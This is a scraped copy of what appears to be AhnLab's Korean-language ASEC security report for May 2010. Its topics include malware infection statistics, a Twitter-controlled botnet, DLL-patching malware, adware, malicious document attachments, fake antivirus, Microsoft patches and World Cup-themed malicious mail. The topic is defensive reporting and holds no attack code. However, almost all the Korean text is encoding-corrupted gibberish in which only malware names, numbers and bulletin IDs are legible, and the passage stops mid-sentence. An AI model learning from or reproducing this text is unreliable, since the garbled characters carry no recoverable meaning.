Upload
others
View
4
Download
0
Embed Size (px)
Citation preview
์ธ์์์ ๊ฐ์ฅ ์์ ํ ์ด๋ฆ ์์ฒ ์์ฐ๊ตฌ์ 01
โ . ์ด๋ฌ์ ๋ณด์ ๋ํฅ
1. ์ ์ฑ์ฝ๋ ๋ํฅ
์ ์ฑ์ฝ๋ ํต๊ณ
2010๋ 5์ ์ ์ฑ์ฝ๋ ํต๊ณํํฉ์ ๋ค์๊ณผ ๊ฐ๋ค.
[ํ 1-2] ์ ์ฑ์ฝ๋ ๋ํ์ง๋จ๋ช ๊ฐ์ผ๋ณด๊ณ Top 20
2010๋ 5์์ ๊ฐ์ผ๋ณด๊ณ ๊ฑด์๋ Win-Trojan/Downloader๊ฐ ์ด 639,702
๊ฑด์ผ๋ก Top20์ค 11.3%์ ๋น์จ๋ก 1์๋ฅผ ์ฐจ์งํ๊ณ ์์ผ๋ฉฐ, Win-Trojan/
Agent์ด 638,457๊ฑด์ผ๋ก 2์, Win-Trojan/Onlinegamehack์ด 476,563
๊ฑด์ผ๋ก 3์๋ฅผ ์ฐจ์ง ํ์๋ค.
์๋ ์ฐจํธ๋ ๊ณ ๊ฐ์ผ๋ก๋ถํฐ ๊ฐ์ผ์ด ๋ณด๊ณ ๋ ์ ์ฑ์ฝ๋ ์ ํ๋ณ ๋น์จ์ด๋ค.
[๊ทธ๋ฆผ 1-1] ์ ์ฑ์ฝ๋ ์ ํ๋ณ ๊ฐ์ผ๋ณด๊ณ ๋น์จ
2010๋ 5์์ ์ ์ฑ์ฝ๋ ๊ฐ์ผ ๋ณด๊ณ ๋ JS/Agent์ด 1์๋ฅผ ์ฐจ์งํ๊ณ ์์ผ
๋ฉฐ, TextImage/Autorun๊ณผ Win32/Induc๊ฐ ๊ฐ๊ฐ 2์์ 3์๋ฅผ ์ฐจ์ง ํ์
๋ค. ์ ๊ท๋ก Top20์ ์ง์ ํ ์ ์ฑ์ฝ๋๋ ์ด 6๊ฑด์ด๋ค.
[ํ 1-1] ์ ์ฑ์ฝ๋ ๊ฐ์ผ๋ณด๊ณ Top 20
์๋ ํ๋ ์ ์ฑ์ฝ๋์ ์ฃผ์ ๋ํฅ์ ํ์ ํ๊ธฐ ์ํ์ฌ, ์ ์ฑ์ฝ๋ ๋ณ ๋ณ์ข ์
์ข ํฉํ ์ ์ฑ์ฝ๋ ๋ํ์ง๋จ๋ช ๊ฐ์ผ๋ณด๊ณ Top20์ด๋ค.
AhnLab Policy Center 4.0
02 ASEC Report _ 2010. Vol.05
์ ์ฑ์ฝ๋ ์ ํ๋ณ ๊ฐ์ผ๋ณด๊ณ ๋น์จ์ ์ ์๊ณผ ๋น๊ตํ๋ฉด, ์คํฌ๋ฆฝํธ, ๋๋กญํผ
(DROPPER), ๋ค์ด๋ก๋(DOWNLOADER)๊ฐ ์ ์์ ๋นํด ์ฆ๊ฐ์ธ๋ฅผ ๋ณด์ด
๊ณ ์๋ ๋ฐ๋ฉด ํธ๋ก์, ์, ๋ฐ์ด๋ฌ์ค(VIRUS), ์ ๋์จ์ด(ADWARE), ์ ํ
์ผ์ด(APPCARE), ์คํ์ด์จ์ด(SPY WARE)๋ ์ ์์ ๋นํด ๊ฐ์ํ ๊ฒ์
๋ณผ ์ ์๋ค.
[๊ทธ๋ฆผ 1-2] ์ ์ฑ์ฝ๋ ์ ํ๋ณ ๊ฐ์ผ๋ณด๊ณ ์ ์ ๋น๊ต
[๊ทธ๋ฆผ 1-3] ์ ์ฑ์ฝ๋ ์๋ณ ๊ฐ์ผ๋ณด๊ณ ๊ฑด์
5์์ ์ ์ฑ์ฝ๋ ์๋ณ ๊ฐ์ผ๋ณด๊ณ ๊ฑด์๋ 11,537,351๊ฑด์ผ๋ก 4์์ ์ ์ฑ
์ฝ๋ ์๋ณ ๊ฐ์ผ ๋ณด๊ณ ๊ฑด์ 10,300,965๊ฑด์ ๋นํด 1,236,386๊ฑด์ด ์ฆ๊ฐํ
์๋ค.
[ํ 1-3] ์ ์ข ์ ์ฑ์ฝ๋ ๊ฐ์ผ๋ณด๊ณ Top 20
5์์ ์ ์ข ์ ์ฑ์ฝ๋ ๊ฐ์ผ ๋ณด๊ณ ์ Top 20์ Win-Trojan/Overtls.
575488๊ฐ 275,685๊ฑด์ผ๋ก ์ ์ฒด 33.3%๋ฅผ ์ฐจ์งํ์ฌ 1์๋ฅผ ์ฐจ์งํ์์ผ๋ฉฐ,
Win-Trojan/Agent. 240222๊ฐ 45,886๊ฑด 2์๋ฅผ ์ฐจ์งํ์๋ค.
์ ์ฑ์ฝ๋ ์ด์
ํธ์ํฐ ๋ด๋ท ์ ์ฑ์ฝ๋
5์์๋ ํธ์ํฐ์ ๋์คํ๋ฅผ ํํ ํธ์ํฐ๋ฅผ ์ด์ฉํ์ฌ ์ ์ฑ์ฝ๋๋ฅผ ์ ์ดํ
๋ ์ ์ฑ์ฝ๋๊ฐ ์๋ ค์ก๋ค. ์ง๊ธ๊น์ง SNS ๊ด๋ จ ์ ์ฑ์ฝ๋๋ ์ฌ์ฉ์ ๊ณ์ ์ด
๋ ๋ฒ๋ ๊ณ์ ์ ์คํธ์ฑ ๋ฉ์์ง๋ฅผ ๋ฌ๊ฑฐ๋ ์ ์ฑ์ฝ๋๊ฐ ์ ๋ก๋ ๋ ์ฌ์ดํธ๋ก
์ ๋ํ๋๊ฒ ์ผ๋ฐ์ ์ด์๋ค. ๊ทธ๋ฌ๋ ํด๋น ์ ์ฑ์ฝ๋๋ ๋จผ์ ์ฌ์ฉ์ ๊ณ์ ์ด
2010๋ 5 ์์ ๊ฐ์ผ๋ณด๊ณ ๊ฑด์๋ ์ ์ฑ์ฝ๋ ์ ํ๋ณ๋ก ๊ฐ์ผ๋ณด๊ณ ๊ฑด์ ๋น์จ
์ ํธ๋ก์(TROJAN)๋ฅ๊ฐ 44.5%๋ก ๊ฐ์ฅ ๋ง์ ๋น์จ์ ์ฐจ์งํ๊ณ , ์คํฌ๋ฆฝ
ํธ(SCRIPT)๊ฐ 13%, ์(WORM)๊ฐ 12.3%์ ๋น์จ์ ๊ฐ๊ฐ ์ฐจ์งํ๊ณ ์๋ค.
[๊ทธ๋ฆผ 1-4] ์ ์ข ์ ์ฑ์ฝ๋ ์ ํ๋ณ ๋ถํฌ
5์์ ์ ์ข ์ ์ฑ์ฝ๋ ์ ํ๋ณ ๋ถํฌ๋ ํธ๋ก์์ด 73%๋ก 1์๋ฅผ ์ฐจ์งํ์๋ค.
๊ทธ ๋ค๋ฅผ ์ด์ด ์ ๋์จ์ด๊ฐ 10%, ๋๋กญํผ๊ฐ 6%๋ฅผ ๊ฐ๊ฐ ์ฐจ์งํ์๋ค.
์๋ ํ๋ 5์์ ์ ๊ท๋ก ์ ์๋ ์ ์ฑ์ฝ๋ ์ค ๊ณ ๊ฐ์ผ๋ก๋ถํฐ ๊ฐ์ผ์ด ๋ณด๊ณ
๋ ์ ์ฑ์ฝ๋ Top20์ด๋ค.
AhnLab V3 Internet Security 8.0
์ธ์์์ ๊ฐ์ฅ ์์ ํ ์ด๋ฆ ์์ฒ ์์ฐ๊ตฌ์ 03
์์คํ ํ์ผ์ ํจ์น ํ๋ ์ ์ฑ์ฝ๋์ BSOD
5์์๋ ์ ๋ํ ์์คํ ํ์ผ์ ํจ์น ํ๋ ์ ์ฑ์ฝ๋ ์์์ด ์์ฃผ ๋ค๋ ค ์
๋ค. ์์คํ ํ์ผ์ ํจ์น ํ๋ ์ ์ฑ์ฝ๋๋ ์์ ์ ์คํ์ ์ํด์ ๋ ์ง์คํธ
๋ฆฌ๋ฅผ ์ด์ฉํ๋ ๊ฒ์ด ์๋๋ผ ํจ์น ๋ ์๋์ฐ ์์คํ ํ์ผ (์ฃผ๋ก DLL ํ์ฅ
์์ ํ์ผ๋ค)์ ํ๋ก๊ทธ๋จ ์์ ๋ถ๋ถ์ ์ฝ๋๋ ์ํฌํธ(Import) ํจ์ ๋ถ๋ถ
์ ์์ ํ์ฌ ์์ ์ ๋์ ์ํค๋ ์ ์ฑ์ฝ๋๋ฅผ ๋งํ๋ค. ์ด๋ฌํ ๊ฒฐ๊ณผ๋ก ๋ถ
ํ ์ ๋ ์ง์คํธ๋ฆฌ ๋ชจ๋ํฐ๋ง์ด๋ ์์ ํ๋ก๊ทธ๋จ์ ๊ด๋ฆฌํ๋ ํ๋ก๊ทธ๋จ๋ค์
์ ์ฑ์ฝ๋์ ์คํ์์ ์ ์ฐพ์ ๋ด์ง ๋ชปํ๊ฒ ๋๋ค. ์ด ๋๋ฌธ์ ์ต๊ทผ ๋ค์ด ์
์ฑ์ฝ๋ ์ ์์ ๋ง์ด ์ฌ์ฉ ๋๊ณ ์๋ค. ์ด๋ฒ์ ํ์ผ์ด ๋ ํ์ผ์ ws2help.
dll ํ์ผ์ด์๋ค. ํนํ, ์ด๋ฒ ์ ์ฑ์ฝ๋๋ ํจ์น ํ ํ์ผ์ ์ฌ๋ฐ๋ฅธ ๊ณณ์ ๋ณต
์ฌํ์ง ์์, ์์คํ ์ด ์ ์์ ์ผ๋ก ๋ถํ ๋์ง ์๋ ์ํฉ์ด ๋ฐ์ํ์๋ค.
๋ค์๊ณผ ๊ฐ์ ๋ฉ์์ง๊ฐ ์ถ๋ ฅ๋๊ณ ์๋์ฐ๊ฐ ์ ์์ ์ผ๋ก ๋ถํ ๋์ง ์์๋ค.
์ผ๋ฐ์ ์ธ ๋ด๋ท์ ์ฐจ๋จ ๋ฐฉ๋ฒ์ ๋ด๋ท์ด ์ด์ฉ ํ๋ ์๋ฒ์ ๋ํ ์ฐจ๋จ์ ํตํด
์ ๊ทผ๋ณธ์ ์ผ๋ก ๋ด๋ท์ด ํ์ฑํ ๋ ์ ์๊ฒ ํ๋ค. ๊ทธ๋ฌ๋ ํธ์ํฐ์ ๊ฐ์ ์
์ฉ ์๋น์ค๋ฅผ ์ด์ฉํ๋ค๋ฉด, ์ผ๋ฐ์ ์ธ ์ฐจ๋จ๋ฐฉ๋ฒ์ ์ฌ์ฉํ ์ ์์ด ๊ณต๊ฒฉ์๋
์์ ๋กญ๊ฒ ๋ช ๋ น์ ๋ด๋ณด๋ผ ์ ์๊ฒ ๋๋ฏ๋ก ์ด๋ฌํ ์์ฉ ์๋น์ค๋ฅผ ์ ์ฉํ๋
๋ด๋ท ์ฌ๋ก๊ฐ ์ฆ๊ฐํ ๊ฒ์ผ๋ก ์์ ๋๋ค.
[๊ทธ๋ฆผ 1-5] ํธ์ํฐ ๋ด์ ์์ฑ ๋ฐ ๋์ ์
[๊ทธ๋ฆผ 1-6] Win-Trojan/Patcher.17945 ๊ฐ์ผ ํ ์๋์ฐ๊ฐ ๋ถํ ๋์ง ์๋ ๋ชจ์ต
์ด๋ฌํ ๊ณผ์ ์ ๋์ํ ํ๋ฉด [๊ทธ๋ฆผ 1-7]๊ณผ ๊ฐ๋ค. ์ฆ ์์์ ์ธ๊ธ ํ๋ฏ์ด
์๋์ฐ ์์คํ ํด๋์ ํจ์น ๋ ํ์ผ์ด ์กด์ฌํด์ผ ํ์ง๋ง ์ ์ฑ์ฝ๋๋ ์์ค
ํ ํด๋๊ฐ ์๋ %windir%system\ ํด๋์ ํจ์น ๋ ํ์ผ์ ๋ณต์ฌํ์๋ค.
[๊ทธ๋ฆผ 1-7] Win-Trojan/Patcher.17945 ์คํ๊ณผ์
๋ ์ด๋ฏธ ํ์ณ๋ธ ๊ณ์ ์ ์ ์ฑ์ฝ๋ ์ ์ด๊ด๋ จ ๋ด์ฉ์ ํธ์ ํ ํ ์ ์ฑ์ฝ๋๊ฐ
์ด๋ฅผ ์ฝ์ด ๋ค์ธ ํ ์ ์์ ์ธ ํ๋์ ์ทจํ๋ค.
์ ํด ๋ง์ผํ ๊ณผ ๊ฒฐํํ ์ ๋์จ์ด
์ธํฐ๋ท ํค์๋ ๊ฒ์ ๋์ฐ๋ฏธ ์๋น์ค๋ ์น ๋ธ๋ผ์ฐ์ ์ฃผ์ ํ์์ค์ ๊ฒ์ํ
๊ณ ์ ํ๋ ํค์๋๋ง ์ ๋ ฅํ๋ฉด ๊ด๋ จ๋ ๊ฒ์ ๊ฒฐ๊ณผ๋ฅผ ๋ณด์ฌ์ฃผ์ด ์ธํฐ๋ท ์ํ
์ ๋์์ ์ค ์ ์๋ค. ํ์ง๋ง ์ต๊ทผ์๋ ์ด๋ค ์ธํฐ๋ท ํค์๋ ๊ฒ์ ๋์ฐ๋ฏธ
์๋น์ค๋ค์ ๋ณด๋ค ๋ง์ ์ฌ์ฉ์๋ค์ PC์ ์ค์นํ๊ธฐ ์ํด ๋ฌด๋ฃ ๊ฒ์, ๋ฌด๋ฃ
์น ํ๋ ์๋น์ค, UCC ์ฌ์๊ธฐ, ๊ธฐํ ์ ๋์จ์ด์ ๋ฒ๋ค ํํ๋ก ์ค์น๋๊ธฐ ์
์ํ๋ค. ๋ํ ๋์ ์์ต์ ์ํด ์ ํด ๋ง์ผํ ์ฌ์ดํธ์ ์ฐ๊ณํด ํน์ ์ผํ
๋ชฐ๋ก ๋ฐฉ๋ฌธ์ ์ ๋ํ๋ ๋ถ์์ฉ์ด ๋ฐ์ํ๊ณ ์๋ค. ์ธํฐ๋ท ๊ฒ์ ๋์ฐ๋ฏธ ์
๋น์ค๋ฅผ ํตํด ์ผํ๋ชฐ์ ๋ฐฉ๋ฌธํ์ฌ ์ํ์ ๊ตฌ๋งคํ๋ ๊ฒฝ์ฐ ๊ฒฐ์ ๊ธ์ก์ ์ผ
์ ๋น์จ์ ์์๋ฃ๋ก ์ ํด ๋ง์ผํ ์ฌ์ดํธ๋ฅผ ํตํด ์ง๊ธ ๋ฐ๊ธฐ ๋๋ฌธ์ด๋ค. ๋
ํ ๋ณด๋ค ๋ง์ ์ฌ์ฉ์๋ค์ ์ปดํจํฐ์ ์ค์นํ๊ธฐ ์ํด ์ ์์ ์ธ ๋ฐฉ๋ฒ๋ค๊น์ง
์ฌ์ฉํ๊ณ ์์ผ๋ฉฐ ๋ณด์ ์ ์ฒด์ ์ง๋จ์ ์ฐํํ๊ธฐ ์ํด ํ๋ก๊ทธ๋จ ๋ด๋ถ์ ํน
์ ๋ฌธ์์ด์ ๋ค๋ฅธ ๋ฌธ์์ ์กฐํฉํ์ฌ ์ผ๋ฐ์ ์ผ๋ก๋ ์์๋ณด๊ธฐ ํ๋ค๊ฒ ๋ณํ
ํด ์ฌ์ฉํ๊ณ ์๋ค.
์ด๊ฒ์ ์ ์ฑ์ฝ๋ ์ ์์์ ์๋์ ์ธ ๊ฒ์ด๋ผ๊ธฐ ๋ณด๋ค๋ ์ค์๋ก ์ถ์ ๋๋ฉฐ
์ด๋ฅผ ๋ณต๊ตฌ ํ๊ธฐ ์ํด์๋ ์๋ณธ ํ์ผ์ ์ฐพ์ ํ์ผ๋ช ์ ๋ณ๊ฒฝํด์ฃผ๋ ๋ฑ์ ์ถ
๊ฐ์์ ์ด ํ์ํ์ฌ ์ฌ์ฉ์๋ค์ด ๋ถํธํจ์ ํธ์ํ ์ฌ๋ก์๋ค.
[๊ทธ๋ฆผ 1-8] ์ ๋ช ์ธํฐ๋ท ์ผํ๋ชฐ ์ฃผ์๋ฅผ ๋ณํ์์ผ ๋์ ๋ถ๋ถ
04 ASEC Report _ 2010. Vol.05
2. ์ํ๋ฆฌํฐ ๋ํฅ
์ํ๋ฆฌํฐ ํต๊ณ
5์ ๋ง์ดํฌ๋ก์ํํธ ๋ณด์ ์ ๋ฐ์ดํธ ํํฉ
๋ง์ดํฌ๋ก์ํํธ์ฌ๋ก๋ถํฐ ๋ฐํ๋ ์ด๋ฒ ๋ฌ ๋ณด์ ์ ๋ฐ์ดํธ๋ 2๊ฑด์ด๋ค.
์ค์ 5์ ์ ์ข ์ ์ฑ์ฝ๋ ๊ฐ์ผ๋ณด๊ณ ๋ฅผ ์ดํด๋ณด๋ฉด Win-Trojan/Overtls, Win-
Trojan/Unovt๊ฐ ๊ฐ๊ฐ 1์์ 4์๋ฅผ ํ๊ณ ์์์ ๋ณผ ์ ์๋ค. ์ฆ, ๊ทธ๋งํผ
๊ตญ๋ด ์ฌ์ฉ์๋ค์ ํผํด๊ฐ ํฌ๋ค๋ ๊ฒ์ ์ ์ ์๋ค. ์ด๋ค ์ธํฐ๋ท ํค์๋ ๊ฒ
์ ๋์ฐ๋ฏธ ์๋น์ค๊ฐ ์ค์น๋์ด ์์ ๊ฒฝ์ฐ ์ธํฐ๋ท ๊ฒ์ ์ ๋ด๊ฐ ์ํ๋ ๊ฒฐ
๊ณผ๊ฐ ์๋ ํด๋น ์ ๋์จ์ด๊ฐ ๋ฐฉ๋ฌธ์ ์ ๋ํ๋ ๊ณณ์ผ๋ก ๋ณ๊ฒฝ๋ ๊ฒ์ ๊ฒฐ๊ณผ๋ฅผ
์ป์ ์ ์์ผ๋ฉฐ, ๋ด๊ฐ ์ ํธํ๋ ์ธํฐ๋ท ์ผํ๋ชฐ์ด ์๋ ์ ๋์จ์ด ์ ์์์
๊ฒ ๋ณด๋ค ๋์ ์์ต์ ์ค ์ ์๋ ์ธํฐ๋ท ์ผํ๋ชฐ๋ก ๋ฐฉ๋ฌธ์ด ์ ๋๋ ์ ์๋ค.
๋ฌธ์ํ์ผ์ ํฌํจ๋ ์ ์ฑ์ฝ๋ ์ฃผ์
5์์๋ ๋ฉ์ผ์ ํตํด ์ ํฌ๋๋ ์ ์ฑ์ฝ๋ ์ค DOC ํน์ RTF ๋ฑ์ ํ์ฅ
์์ ๋ฌธ์๋ฅผ ์ด์ฉํ ์ ์ฑ์ฝ๋ ์ ํฌ ์ฌ๋ก๊ฐ ํ์ธ๋์๋ค. [๊ทธ๋ฆผ 1-9]์ ์
๋ ์ฒจ๋ถํ์ผ์ ์คํํ๋ฉด ๋ฌธ์ ๋ด๋ถ์ ํน์ ์์ด์ฝ์ด ๋ํ๋๋ฉฐ ํด๋ฆญ์ ์
๋ํ๊ฒ ๋๋ค.
[๊ทธ๋ฆผ 1-9] ์ ์ฑ์ฝ๋๊ฐ ํฌํจ๋ ๋ฌธ์ ์ด๋ ์ ๋ํ๋๋ ๊ฒฝ๊ณ ์ฐฝ
๋ง์ผ, ํด๋ฆญ์ ํ๊ฒ ๋๋ฉด ๊ฒฝ๊ณ ์ฐฝ์ด ๋ํ๋๋ฉฐ [ํ์ธ] ๋ฒํผ์ ๋๋ฅผ ๊ฒฝ์ฐ ๋ฌธ์
๋ด๋ถ์ ํฌํจ๋ ์ ์ฑ์ฝ๋๊ฐ ์คํ์ด ๋๋ค. ์ต๊ทผ ์ ์ฑ์ฝ๋ ์ ํฌ ๊ธฐ๋ฒ์ด ์ ์
๋ค์ํด์ง๋ฉฐ ๋ฐ์ ๋๊ณ ์์ด ์ด๋ฌํ ๋ฐ์ ์ธ์ด ๋ถ๋ถ๋ช ํ ๋ฉ์ผ์ ํตํด ์ฒจ๋ถ
๋๋ ๋ฌธ์๋ ๊ธฐํ ์ฒจ๋ถํ์ผ์ ๋๋๋ก์ด๋ฉด ์คํํ์ง ์๋ ๊ฒ์ ๊ถ์ฅํ๋ค.
ํ์ ๋ฐฑ์ Digital Protection / Data Protection ์ฃผ์
5์์๋ ์ ๋ํ Digital Protection, Data Protection ๋ผ๋ ์ด๋ฆ์ ๊ฐ์ง ํ
์ ๋ฐฑ์ ์ด ๊ธฐ์น์ ๋ถ๋ ธ๋ค. ํด๋น ํ์๋ฐฑ์ ์ด ์ค์น๊ฐ ๋๋ฉด ์์คํ ํธ๋ ์ด
์ฐฝ์ ์ง์์ ์ธ ๊ฒฝ๊ณ ๋ฅผ ๋ํ๋ด๋ฉฐ ์ธํฐ๋ท ์ต์คํ๋ก๋ฌ๋ฅผ ์ด์ฉํ์ฌ ์น์ฌ์ด
ํธ ์ ์ ์ ์ฌ์ดํธ ์ ์์ ์ฐจ๋จํ๋ฉฐ ์ ์ฑ์ฝ๋ ๊ฐ์ผ ๊ฒฝ๊ณ ๋ฐ ๊ฒฐ์ ์ฐฝ์ ๋ณด
์ฌ์ฃผ๊ฒ ๋๋ค.
[๊ทธ๋ฆผ 1-8] ์ ๋ช ์ธํฐ๋ท ์ผํ๋ชฐ ์ฃผ์๋ฅผ ๋ณํ์์ผ ๋์ ๋ถ๋ถ
์ด๋ฌํ ํ์ ๋ฐฑ์ ์ด ์ค์น๋ ๊ฒฝ์ฐ ์ธ๋ถ๋ก ์คํธ๋ฉ์ผ์ ๋ฐ์กํ์ฌ ์์คํ ์ด
๋๋ ค์ง๊ฑฐ๋ ๋คํธ์ํฌ ํธ๋ํฝ์ด ๋ง์ด ๋ฐ์ํ๋ ์ฆ์์ ๋ณด์ด๊ณ ์๋ค. ํ์ฌ
V3 ์ ํ์์ ๋๋ค์ ์ง๋จ ๋ฐ ์น๋ฃ๊ฐ ๊ฐ๋ฅํ๋ ์ง์์ ์ธ ๋ณ์ข ์ด ์ถํํ
๊ณ ์์ด ๊ฐ๋ณํ ์ฃผ์๊ฐ ํ์ํ๋ค. V3๋ ๋ณ์ข ์ ๋ฐ๊ฒฌ์ ์ต์ ์์ง์ ์ ์
ํ์ฌ ์ง๋จ ๋ฐ ์น๋ฃํ๊ณ ์์ผ๋, ํญ์ ์ต์ ๋ฒ์ ์ ์์ง์ ์ค์นํ์ฌ ๋ณ์ข ์
์ฌ์ ์ ์ฐจ๋จํ๊ธฐ ๋ฐ๋๋ค.
์จ๋ผ์ธ ๊ฒ์ํต ๋ฅ ์ ์ฑ์ฝ๋๋ก ์ธํ ํ/์ ์ ํ ๋ถ๊ฐ ์ฌ๋ก
์ต๊ทผ ๊ตญ๋ด ์น์ฌ์ดํธ๋ฅผ ํตํด ์ ํฌ๋๋ ์จ๋ผ์ธ ๊ฒ์ํต์ด ๋ง์ด ์ ํฌ๋๊ณ ์
๋ค. ํด๋น ์ ์ฑ์ฝ๋๋ ๊ฒ์ ๊ณ์ ์ ํ์ทจํ๋ ๋ชฉ์ ์ ์ง๋ ์ ์ฑ์ฝ๋๋ก ์ต
๊ทผ ํด๋น ์ ์ฑ์ฝ๋์ ๊ฐ์ผ๋ ๊ฒฝ์ฐ imm32.dll ํ์ผ์ด ๋ณ์กฐ๋์ด ํ/์ ์ ํ
์ด ๋ถ๊ฐ๋ฅํ ์ฆ์์ด ๋ฐ๊ฒฌ๋๊ณ ์๋ค. ์ด๋ฌํ ์ฆ์์ด ๋ํ๋ ๊ฒฝ์ฐ ์ ์ฑ์ฝ
๋์ ๊ฐ์ผ๋ ๊ฒ์ผ๋ก ์์ฌํด ๋ณด์์ผ ํ๋ฉฐ, V3 ์ ํ์ ์ค์นํ์ฌ ์์ง์ ์ต
์ ๋ฒ์ ์ผ๋ก ์ ๋ฐ์ดํธ ํ ํ ๊ฒ์ฌ ๋ฐ ์น๋ฃ๋ฅผ ๊ถ์ฅํ๋ค. ๋ง์ฝ ์๋์ผ๋ก ์กฐ
์นํ๊ณ ์ ํ๋ค๋ฉด http://core.ahnlab.com/173 ํ์ด์ง๋ฅผ ์ฐธ๊ณ ํ์ฌ ์กฐ์น
ํ๊ธฐ ๋ฐ๋๋ค.
์ธ์์์ ๊ฐ์ฅ ์์ ํ ์ด๋ฆ ์์ฒ ์์ฐ๊ตฌ์ 05
[๊ทธ๋ฆผ 2-1] ๊ณต๊ฒฉ ๋์ ๊ธฐ์ค ๋ณ MS ๋ณด์ ์ ๋ฐ์ดํธ[๊ทธ๋ฆผ 2-3] ์ ์ฑ์ฝ๋ ๋ฐฐํฌ๋ฅผ ์ํด ์ฌ์ฉ๋ ์ทจ์ฝ์
[๊ทธ๋ฆผ 2-2] ์ ์ฑ์ฝ๋ ๋ฐฐํฌ๋ฅผ ์ํด ์นจํด๋ ์ฌ์ดํธ / ๋ฐฐํฌ์ง ์
[ํ 2-1] 2010๋ 5์ ์ฃผ์ MS ๋ณด์ ์ ๋ฐ์ดํธ
5์์๋ 4์์ ๋ฐํ๋ 11๊ฑด๋ณด๋ค ํจ์ฌ ์ ์ 2๊ฑด์ ํจ์น๊ฐ ๋ฐํ๋์๋ค. ์ด
๋ฒ์ ๋ฐํ๋ MS10-030 (์๋์ฐ ๋ฉ์ผ ์ทจ์ฝ์ ์๊ฒฉ์ฝ๋ ์คํ ์ทจ์ฝ์ )์
์ฌ์ฉ์๊ฐ ์ ์์ ์ธ ๋ฉ์ผ ์๋ฒ์ ๋ฐฉ๋ฌธํ๋๋ก ์ ๋ํ์ฌ ์์์ ์ฝ๋๋ฅผ ์ค
ํํ๋๋ก ํ๋ค. ๋น์ฃผ์ผ ๋ฒ ์ด์ง ์ทจ์ฝ์ ์ VBA(Visual Basic for Applica-
tions)๋ฅผ ์ง์ํ๋ ๋ฌธ์์์ ActiveX ์ปจํธ๋กค์ ๊ฒ์ํ๋ ๋ฐฉ์์ผ๋ก ์ธํด
๋ฐ์ํ๋ค. ํน์ํ๊ฒ ์กฐ์๋ ๋ฌธ์๋ฅผ VBA ๋ฐํ์์ผ๋ก ์ ๋ฌํ๋ฉด ์์์ ์ฝ
๋๋ฅผ ์คํํ ์ ์๋ ์กฐ๊ฑด์ด ๋ง๋ค์ด์ง๋ค. ์ด๋ฒ ๋ฌ์ ๋ฐํ๋ ๋ณด์ํจ์น๋
์๊ฒฉ์ฝ๋ ์คํ์ทจ์ฝ์ ์ด ์กด์ฌํ๋ ๋งํผ ํด๋น ์ ํ์ ์ฌ์ฉ ์ค์ด๋ผ๋ฉด ๋น ๋ฅธ
ํจ์น๋ฅผ ๊ถ๊ณ ํ๋ค.
์ ์ฑ์ฝ๋ ์นจํด ์น์ฌ์ดํธ ํํฉ
[๊ทธ๋ฆผ 2-2]๋ ์๋ณ ์ ์ฑ์ฝ๋ ์นจํด ์ฌ์ดํธ ํํฉ์ ๋ํ๋ธ ๊ทธ๋ํ๋ก, 2010
๋ 1์๋ถํฐ 4์๊น์ง ๊พธ์คํ ์ฆ๊ฐํ๋ค๊ฐ 5์์ ๋ค์ ๊ฐ์ํ์๋ค. 5์์๋
์ง๋ 4์๊ณผ ๋น์ทํ๊ฒ ์นจํด ์ฌ์ดํธ๋ฅผ ํตํด์ ์ ํฌ๋๋ ์ ์ฑ์ฝ๋์ ๋๋ถ๋ถ
์ Win-Trojan/Daonol ๋ณ์ข ๋ค์ด์๋ค.
[๊ทธ๋ฆผ 2-3]์ ์๋ณ ์นจํด์ฌ๊ณ ๊ฐ ๋ฐ์ํ ์น์ฌ์ดํธ๋ค์์ ์ ์ฑ์ฝ๋๋ฅผ ์ ํฌ
ํ๊ธฐ ์ํด์ ์ฌ์ฉํ๋ ์ทจ์ฝ์ ๋ค์ ๋ํ ํต๊ณ๋ก, ์ ์๊ณผ ๋์ผํ๊ฒ MS06-
014 ์ทจ์ฝ์ ์ ์ฌ์ฉํ ์ ์ฑ์ฝ๋ ์ ํฌ๊ฐ ๊ฐ์ฅ ๋ง์๋ค. ๊ทธ๋ฆฌ๊ณ ์ทจ์ฝ์ ID์
์๋ ๋ณผ ์ ์๋ฏ์ด MS06-014๋ 2006๋ ๋์ ๋ฐ๊ฒฌ๋ ์ทจ์ฝ์ ์ธ๋ฐ ๊ฐ์ฅ
๋ง์ด ์ฌ์ฉ๋๋ ๊ฒ์ ๋ณผ ๋ ์์ง๋ ๋ง์ Internet Explorer์ฌ์ฉ์๋ค์ด ๋ณด์
ํจ์น๋ฅผ ์ ์ฉํ์ง ์๊ณ ์ฌ์ฉํ๊ณ ์๋ ๊ฒ์ผ๋ก ํ๋จ๋๋ค.
์ํ๋ฆฌํฐ ์ด์
๋จ์๊ณต์๋์ปต์ ์์ฅํ ์ ์ฑ์ฝ๋ ๊ตญ๋ด๋ฐ๊ฒฌ
2010๋ ๋จ์๊ณต ์๋์ปต์ ์๋๊ณ ์ด๋ฅผ ์ ์ฉํ ์ ์ฑ์ฝ๋๊ฐ ๋ณด๊ณ ๋์๋ค. ์ด
๋ฒ์ ๋ณด๊ณ ๋ ์ ์ฑ์ฝ๋๋ ํ๊ธ๋ก ์์ฑ๋ ์ด๋ฉ์ผ์ ํตํด ์ ํ๊ฐ ๋๋ ํน์ง
์ ๊ฐ์ง๊ณ ์๋ค. ์ฌ 3์์ ์๋์ปต ๊ด๋ จ ๋ฉ์ผ๋ก ์์ฅํ ์คํธ๋ฉ์ผ์ด ์ ํฌ๊ฐ
๋์์ง๋ง, ๊ทธ ๋น์์๋ ์๋ฌธ์ด์๋ค. ์ด๋ฒ์ ํ๊ตญ์ด๋ก ์์ฅํ ๋ฉ์ผ์ ์ ๋ชฉ
์ด โ๋จ์๊ณต ์๋์ปต ์ง์ ๋ณผ ์ ์๋ค!โ ์ ๊ฐ์ด ์ฌ์ฉ์๋ฅผ ํํนํ๋ ๋ฌธ๊ตฌ
๋ฅผ ์ด์ฉํ์๋ค. ์ง๊ธ๊น์ง ๋ณด๋ฉด ์ค์ํ ํ์ฌ๊ฐ ์์ผ๋ฉด ์ด๊น์์ด ๊ด๋ จํ ์
์ฑ์ฝ๋๊ฐ ๋ํ๋๋ค. ์ด์ ๋ฅผ ์ดํด๋ณด๋ฉด, ์๋ฌด๋๋ ์ฌํ์ ๊ด์ฌ์ด ๋๊ธฐ ๋๋ฌธ
์ ์ฌ์ฉ์๋ค์ด ์ ์ฑ๋ฉ์ผ์ ์ด์ด๋ณผ ๊ฐ๋ฅ์ฑ์ด ๋๋ค๋ ์ ์ ์ ์ฉํ๋ ๊ฒ์ผ
๋ก ๋ณด์ธ๋ค. ์ง๊ธ๋ถํฐ ํด๋น ์ ์ฑ์ฝ๋๋ฅผ ์ดํด๋ณด์. ๋จผ์ , ์ ์ฑ๋ฉ์ผ์ ์ฒจ๋ถ
